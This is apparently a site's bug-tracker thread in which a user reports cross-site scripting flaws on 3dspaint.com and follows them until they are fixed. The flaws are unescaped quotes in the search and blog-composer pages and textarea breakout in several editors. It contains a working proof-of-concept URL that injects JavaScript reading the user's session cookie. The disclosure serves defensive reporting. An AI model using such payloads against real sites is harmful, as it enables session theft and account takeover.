By UwUQueen
16 Jan 2025 14:46
Category: Other

These pages /blogsearch.php, /blog/composer.php and /forum/search.php all do not sanitize '"' character which allows an attacker to run JavaScript in the user's browser by tricking the user into clicking their malicious link pointing to their malicious redict site and submitting a forum with the exploit payload in it directed at any of the above sections.

Blog Search POC: [a]https://3dspaint.com/blogsearch.php?title=Click%20me!%22%20onclick=%22let%20afterUserInfo=document.getElementsByClassName('menu_section'%5B0%5D.parentNode;%20let%20cookieStr='Your%20session%20info%20is:'.concat(document.cookie);%20let%20h1=document.createElement('h1';%20let%20div=document.createElement('div';h1.innerText='Your%20Cookie';div.style.backgroundColor='purple';div.style.color='pink';div.style.fontSize='18px';div.style.overflow='scroll';div.style.marginLeft='15px';div.style.marginRight='15px';div.style.borderRadius='10px';div.innerText=cookieStr;afterUserInfo.insertBefore(h1,%20afterUserInfo.children%5B2%5D);afterUserInfo.insertBefore(div,%20afterUserInfo.children%5B3%5D);this.value='';this.onclick=null;[/a]
(link will need to be manually copy and pasted into browser to view the results)

Source code:https://3dspaint.com/blogsearch.php?title=Click me!" onclick="let afterUserInfo=document.getElementsByClassName('menu_section'[0].parentNode; let cookieStr='Your session info is:'.concat(document.cookie); let h1=document.createElement('h1'; let div=document.createElement('div';h1.innerText='Your Cookie';div.style.backgroundColor='purple';div.style.color='pink';div.style.fontSize='18px';div.style.overflow='scroll';div.style.marginLeft='15px';div.style.marginRight='15px';div.style.borderRadius='10px';div.innerText=cookieStr;afterUserInfo.insertBefore(h1, afterUserInfo.children[2]);afterUserInfo.insertBefore(div, afterUserInfo.children[3]);this.value='';this.onclick=null;

Resolved: Yes
Other Highest 2 hr

By @UwUQueen
24 Feb 2025 05:40

The initial reports have been fixed

By @UwUQueen
29 Jan 2025 21:04

The link
https://3dspaint.com/blog/composer.php?id=103283 corrected

By @UwUQueen
29 Jan 2025 21:03

This link demonstrates both title input escape and a body textarea escape in blog edit [a] https://3dspaint.com/blog/composer.php?id=103283[/a]

By @UwUQueen
27 Jan 2025 07:08

... Needs sanitization

By @UwUQueen
27 Jan 2025 07:06

<textarea> in settings for profile, blog editer, group editer and group page <textarea>s.

Tmj tileset has textarea shows "<br />" for newlines and should not have the <br /> tag, but should prevent html (as it is doing correctly atm)

By @UwUQueen
27 Jan 2025 06:05

Here's an example blog that demonstrates this
https://3dspaint.com/blog/composer.php?id=103276,

This includes, group page edit, and main group edit too

By @UwUQueen
27 Jan 2025 06:03

I just discovered that all textboxes that use <textarea> can also be closed by the user and javascript can be added after the closed textarea

By @UwUQueen
27 Jan 2025 03:18

Blog edit is not fixed.

By @UwUQueen
27 Jan 2025 03:18

Forum search and blog search fixed

https://3dspaint.com/blog/composer.php?id=103275

By @HullBreach
27 Jan 2025 03:11

I believe these are all resolved now. Let me know if they look good, and I'll close this.

@UwUQueen marked this request as resolved.
11 Apr 2025 02:18

@UwUQueen reopened this request.
11 Apr 2025 02:18

@UwUQueen marked this request as resolved.
24 Feb 2025 05:40

@UwUQueen left a reply.
24 Feb 2025 05:40

@UwUQueen left a reply.
29 Jan 2025 21:04

@UwUQueen left a reply.
29 Jan 2025 21:03

@UwUQueen left a reply.
27 Jan 2025 07:08

@UwUQueen left a reply.
27 Jan 2025 07:06

@UwUQueen left a reply.
27 Jan 2025 06:05

@UwUQueen left a reply.
27 Jan 2025 06:03

@UwUQueen left a reply.
27 Jan 2025 03:18

@UwUQueen left a reply.
27 Jan 2025 03:18

@HullBreach claimed ownership of this request.
27 Jan 2025 03:11

@HullBreach changed the hour estimate from 0.
27 Jan 2025 03:11

@HullBreach left a reply.
27 Jan 2025 03:11

@UwUQueen set the priority.
16 Jan 2025 15:02

@UwUQueen created this request.
16 Jan 2025 14:46